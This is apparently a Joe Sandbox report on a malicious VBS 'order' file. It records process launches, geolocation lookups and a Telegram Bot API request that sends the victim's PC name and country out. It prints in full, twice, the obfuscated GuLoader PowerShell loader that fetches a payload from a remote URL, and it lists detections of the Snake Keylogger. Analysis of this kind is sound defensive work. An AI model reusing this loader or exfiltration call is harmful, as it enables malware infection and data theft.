                                                                            2024-10-23 15:24:02 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.10 | 49995 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:24:04 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:04 UTC | 888 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:04 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32980
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Meua0N3U54eISYA6qw02X2i0K5oE2QH9KrwEoroyncLAP7P2sIeGKFWAQwjtFQokVMS5tc4SQpCkfcX4r7TPa4Jmb2uC3nQHGlPqEngzHIhZHdAiGD41x6d66zEQUjdpTTIHRkV"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb5ef9f6a918-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1523&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1758348&cwnd=177&unsent_bytes=0&cid=3cdcea4f41d151ec&ts=157&x=0"
                                                                            2024-10-23 15:24:04 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            13 | 192.168.2.10 | 49996 | 149.154.167.220 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:24:05 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:05 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 23 Oct 2024 15:24:05 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-10-23 15:24:05 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                            Target ID:0
                                                                            Start time:11:22:53
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
                                                                            Imagebase:0x7ff7e2c60000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:11:22:56
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi 
ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') 
;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:11:22:56
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:11:23:09
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi 
ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') 
;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
                                                                            Imagebase:0x470000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:11:23:09
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:11:23:30
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                            Imagebase:0x100000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9ef07b3d0971bd3ac47f145350dcc3c355254742104630077e7f2a30e0bafb76
                                                                              • Instruction ID: b75db47de14fae2fd8a2b14cce2de540d3d6cd3d11ba665567981ee1c2291f88
                                                                              • Opcode Fuzzy Hash: 9ef07b3d0971bd3ac47f145350dcc3c355254742104630077e7f2a30e0bafb76
                                                                              • Instruction Fuzzy Hash: D2E12631E0DA858FE795AB6C84552B8F7F1FF56A21F5802BEC00DC7187DE28AC498752
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4f82fd3de82f6a90dde673a64d352d79a7502dcf28829b7cf0c67eaa74cd549
                                                                              • Instruction ID: e22b0c6498866e907665bd3582bd91dea724f3953072b0807c10005a78aa6144
                                                                              • Opcode Fuzzy Hash: b4f82fd3de82f6a90dde673a64d352d79a7502dcf28829b7cf0c67eaa74cd549
                                                                              • Instruction Fuzzy Hash: FCC16A32E0DACA4FEB95AB6C88106B4BBE1EF56721B9411FAC15DC7193DE24AC02C351
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45a2eeec77e10a51ab213283db06ff99c8fcab72bb0721110cf8c48b24b0de95
                                                                              • Instruction ID: 2ac863f9d393150bbdd93b8537ea42342e235670f8749819fa7a6ebcdebade14
                                                                              • Opcode Fuzzy Hash: 45a2eeec77e10a51ab213283db06ff99c8fcab72bb0721110cf8c48b24b0de95
                                                                              • Instruction Fuzzy Hash: A5C13521A0EBC64FE792AB7C48506B4BBF1EF67611B4802FBC159CB1D7D918AC09C361
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
